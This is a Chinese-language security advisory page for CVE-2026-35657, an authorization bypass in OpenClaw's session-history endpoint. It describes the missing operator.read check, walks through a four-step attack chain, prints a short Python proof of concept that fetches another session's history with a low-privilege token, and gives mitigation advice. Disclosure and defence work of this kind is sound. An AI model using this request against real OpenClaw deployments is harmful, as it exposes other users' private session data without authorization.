IPBUF安全漏洞报告
English
CVE-2026-35657 CVSS 6.5 中危

CVE-2026-35657 OpenClaw授权绕过漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-35657
漏洞类型
权限绕过
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限绕过OpenClaw信息泄露CWE-285Authorization Bypass

漏洞概述

OpenClaw在2026年3月25日之前的版本中存在授权绕过漏洞。该漏洞位于HTTP /sessions/:sessionKey/history路由,由于系统错误地跳过了operator.read权限范围的验证,导致攻击者可以利用低权限账户身份,直接向易受攻击的端点发送HTTP请求。这使得攻击者能够在未获得适当操作员读取权限的情况下,非法访问并获取敏感的会话历史记录,从而造成严重的信息泄露风险。

技术细节

该漏洞的根源在于OpenClaw应用程序在处理特定API请求时,未能正确执行访问控制策略。具体而言,/sessions/:sessionKey/history路由的后端代码逻辑中缺少了对operator.read scope的强制校验机制。通常,系统应验证请求者的身份令牌是否包含读取会话历史的特定权限,但此验证步骤被意外跳过。攻击者利用该漏洞无需具备高权限管理员身份,仅需拥有一个基本的低权限账户(满足PR:L条件)。攻击过程无需复杂的用户交互(UI:N),攻击者只需构造包含目标sessionKey的HTTP GET请求,并附带低权限凭证发送至服务器。由于服务端未拦截请求,攻击者即可成功获取本应受限的会话历史数据,导致高机密性影响(C:H),但对完整性和可用性无直接影响。

攻击链分析

STEP 1
1
攻击者获取OpenClaw应用程序的一个低权限账户,并获得有效的身份认证令牌(API Token或Session Cookie)。
STEP 2
2
攻击者确定目标会话的sessionKey(可能通过猜测、枚举或通过其他低权限信息获取接口获得)。
STEP 3
3
攻击者向/sessions/:sessionKey/history端点发送带有低权限认证信息的HTTP GET请求。
STEP 4
4
由于后端跳过了operator.read scope验证,服务器返回该会话的详细历史记录,攻击者成功窃取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_host = "http://vulnerable-openclaw-instance" session_key = "TARGET_SESSION_KEY" url = f"{target_host}/sessions/{session_key}/history" # Attacker's low-privilege token (Low privileges required) auth_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." headers = { "Authorization": f"Bearer {auth_token}", "Accept": "application/json" } try: # Send GET request to vulnerable endpoint response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit Successful! Leaked Session History:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界(如WAF或反向代理)上对/sessions/*/history路径实施严格的访问控制策略,仅允许特定受信任的管理员IP地址访问,或暂时禁用该功能接口以防止信息泄露。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表